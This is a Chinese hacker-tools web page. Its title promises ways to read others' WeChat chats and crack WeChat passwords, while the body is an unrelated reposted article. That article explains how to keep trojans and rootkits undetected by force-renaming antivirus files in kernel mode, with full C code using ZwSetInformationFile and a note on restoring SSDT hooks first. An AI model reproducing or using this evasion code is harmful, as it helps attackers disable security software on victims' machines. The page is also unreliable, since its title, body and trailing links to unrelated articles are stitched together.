如何查别人的微信聊天内容 微信密码如何可以破解

访客4年前黑客工具986

这篇文章本来前2天就打算发出来的,最近手头有点小事,今天有空就把这篇文章整理出来了,前面先说点题外话。对于传统的远控来说,由于流传面积广,都成为各大杀软的重点查杀目标。不光特征码多,还有个致命缺陷。那就是关键释放过程早已被杀软熟悉了,严格的来说,这些木马的行为已经被杀软所掌握。如注射远程线程,启动傀儡IE,加载驱动,注册服务,修改敏感系统注册表键值等,这些行为靠修改特征码是很难做到的。所以经常出现这样的情况,刚做好的免杀过不了多久总会被杀软查杀。基本处于 免杀->被杀->在免->再被杀 尤其是象鸽子 PS这样的远控,如果是仅仅为控制好玩,那我不多说什么了。如果要使自己的ROOTKIT能够在服务器上长期存在,那么势必要自己独立开发一款属于自己的ROOTKIT,这个不是今天要讲的主题,以后有时间了,在发写如何编写ROOTKIT的文章,上周我发了一篇关于“一句话过360监控”的帖子,好象前天360已经修复了这个漏洞。今天我就说下,如何打造穿透所有杀软监控的程序。   首先 明确一点 当一个文件的路径被改变的时候,其应用程序就会发生错误,要么退出,要么崩溃。一般杀软为了保护自己的文件不被重命名,要么设置文件为“只读”属性,,要么利用Inline Hook IofCallDriver拦截删除(重命名)文件请求的API 如(CreateFile()),这样保护了自己的文件不被删除或重命名。其实重命名就是一个删除文件,再建文件的过程。   关于具体的实现代码,请百度或者google下,关于ring3下利用createFile()和Inline Hook IofCallDriver保护文件不被删除的原理,这里主要将如何强行重命名文件,导致杀软的所有监控失效。   对于一句话过360监控,我们是通过MoveFile()实现的,跟踪MoveFile可知,它会调用ZwSetInformationFile实现文件移动功能,这里要说下关于FileInformation的结构_FILE_RENAME_INFORMATION是未公开的,所以还是逆向下他的结构。   typedef struct _FILE_RENAME_INFORMATION {   BOOLEAN ReplaceIfExists;   HANDLE  RootDirectory;   ULONG   FileNameLength;   WCHAR   FileName[1];   } FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;   其中ReplaceIfExists判断是否存在重命名的文件夹,RootDirectory 文件的绝对物理路径,ULONG   FileNameLength文件名字长度,FileName文件名。这里说下,关于FileNameLength这个参数可以通过sizeof()这个函数获得,我们的实现过程如下,利用ZwCreateFile()打开文件夹,利用ZwSetInformationFile修改文件名。其实现代码如下:   NTSTATUS Rename(PCHAR szFileName1,PCHAR szFileName2)   {   FILE_RENAME_INFORMATION fri;   IO_STATUS_BLOCK iostatus;   OBJECT_ATTRIBUTES oa;   UNICODE_STRING pathnameW;   ANSI_STRING   pathnameA;   NTSTATUS status;   HANDLE hfile =NULL;   CHAR szFileNameL[MAXPATHLEN];   strcpy(szFileNameL,"\\\\DosDevices\\\\");   strcat(szFileNameL,szFileName1);   RtlInitAnsiString(&pathnameA,szFileNameL );   RtlAnsiStringToUnicodeString(&pathnameW,&pathnameA,TRUE);   InitializeObjectAttributes(&oa, &pathnameW, OBJ_CASE_INSENSITIVE, NULL, NULL);   status = ZwCreateFile(&hfile, DELETE, &oa, &iostatus, NULL, 0, FILE_SHARE_READ,FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT, NULL,0);   RtlFreeUnicodeString(&pathnameW);   if(!NT_SUCCESS(status))   {   goto done;   }   strcpy(szFileNameL,\"\\\\DosDevices\\\\\");   strcat(szFileNameL,szFileName2);   RtlInitAnsiString(&pathnameA,szFileNameL );   RtlAnsiStringToUnicodeString(&pathnameW,&pathnameA,TRUE);   fri.FileNameLength=pathnameW.Length;   memcpy(fri.FileName,pathnameW.Buffer,pathnameW.Length);   fri.ReplaceIfExists=0;   fri.RootDirectory=0;   status = ZwSetInformationFile(hfile,&iostatus,&fri,sizeof(fri),FileRenameInformation);   RtlFreeUnicodeString(&pathnameW);   done:   if(hfile)   {   ZwClose(hfile);   }   return status;   }   这样就可以实现在RING0下强行重命名文件的效果了。当然对于AVP这样底层HOOK的比较深的杀软来说,事先还是需要恢复SSDT才能重命名文件的。一般来说,他会从驱动层过滤IoCallDriver()的请求,导致文件重命名失效,所以对于一些特殊的杀软还是要"特殊照顾"的。

相关文章

黑科技远程监控器(黑科技远程监控另一部手机)

黑科技远程监控器(黑科技远程监控另一部手机)

不用网络的监控器真的可以实现吗? 1、监控没有网络可以用。监控可以不需要连接网络。监控系统不需要连接网络也是可以监控的,摄像机只要有电源就可以工作的,不过一般要的都是一套监控系统,无线监控系统是自主局...

新手入门单反相机什么牌子好(推荐几个性价比

新手入门单反相机什么牌子好(推荐几个性价比

如今微单的功能也是很强大,而且携带比较方便,也是深受大家的喜爱,特别是像女孩子们出游,很小巧又不重。下面也给大家推荐几款微单。 今天有关于单反相机推荐的文章就给大...

面包屑导航详情使用方法和作用!

面包屑导航详情使用方法和作用!

面包屑导航是每一个网站必备的一个细节优化方面,坦率的说,如果一个网站没有面包屑导航,可以初步判断,改网站的模板设计并不是很理想,那么面包屑导航作用是什么呢,我们如何增加网站的面包屑导航呢? 面包...

海澜之家加盟条件(海澜之家的特许加盟模式)

澜之家加盟条件(海澜之家的特许加盟模式) 首先我们对在服装行业以托管加盟模式获得巨大成功的海澜之家进行分析,在海澜集团诸多项目运营中,仅凭海澜之家的成功运营就盘活了整个集团,无疑说明了这种模式的巨大...

华春莹向美方提出交涉怎么回事?华春莹向美方提出交涉说了什么

外交部新闻司司长华春莹26日约见美国驻华使馆负责人,奉示就美国国务卿蓬佩奥对中方处理《华尔街日报》发表辱华标题评论文章再次发表不当言论以及白宫国安会发言人扬言美方对驻美中国媒体记者采取措施提出严正交涉...

高通曝出新高危漏洞,威胁数百万安卓设备_腾讯科技

  8月6日,研究人员发现高通的Snapdragon SoC WLAN固件存在两个严重缺陷,统称QualPwn。高通芯片的这一新缺陷使数百万安卓设备暴露在黑客攻击之下,黑客可以在没有用户交互的情况下,...